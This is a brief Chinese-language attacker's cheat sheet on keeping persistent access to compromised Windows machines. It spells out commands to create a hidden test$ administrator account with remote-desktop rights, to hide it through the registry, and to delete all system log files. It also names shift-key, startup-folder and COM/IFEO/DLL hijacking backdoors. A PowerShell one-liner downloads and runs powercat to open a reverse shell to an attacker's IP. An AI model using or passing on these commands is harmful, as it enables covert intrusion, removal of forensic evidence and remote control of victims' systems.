权限维持的方法
基本上现在常见的方法有以下几种:
1、隐藏、克隆账户
windows 隐藏账户
net localgroup “Domain Admin” test$ /add
net user test$ test /add
net localgroup Administrators test$ /add
net localgroup "Remote Desktop Users" test$ /add
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinLogonSpecialAccountsUserList" /v test$ /T REG_DWORD /D 0
net user test$ /del
del %WINDIR%*.log /a/s/q/f 删除所有日志文件
2、shift后门
3、启动项、计划任务
C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsstartup
4、劫持技术
com劫持
映像劫持 : 改注册表,debugger
dll劫持,clr
5、Powershell后门
powershell IEX (New-Object
System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip地址 -p 端口 -e cmd
详细步骤链接:https://www.cnblogs.com/xiaozi/p/7613288.html